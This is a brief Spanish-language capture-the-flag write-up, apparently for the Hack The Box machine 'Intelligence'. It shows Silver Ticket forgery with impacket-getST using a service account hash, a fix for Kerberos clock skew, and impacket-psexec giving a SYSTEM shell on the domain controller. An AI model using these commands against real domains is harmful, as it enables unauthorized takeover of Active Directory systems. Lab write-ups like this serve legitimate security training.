Silver Ticket
impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes :c699eaac79b69357d9dabee3379547e6 -impersonate Administrator
Si te sale este error:
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Solo debes actualizar el reloj esto lo hacemos con:
sudo apt-get install ntpdate
sudo ntpdate 10.10.10.248
=> 1 Nov 05:23:45 ntpdate[295766]: step time server 10.10.10.248 offset +25202.808937 sec
#OTRA OPCION
sudo apt-get install chrony
sudo timedatectl set-ntp true
sudo ntpdate <machine IP>
Exportamos la variable del archivo generado
export KRB5CCNAME=Administrator.ccache
Obteniendo consola
impacket-psexec intelligence.htb/Administrator@dc.intelligence.htb -k -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file UmMXtxAq.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service JzWD on dc.intelligence.htb.....
[*] Starting service JzWD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Last updated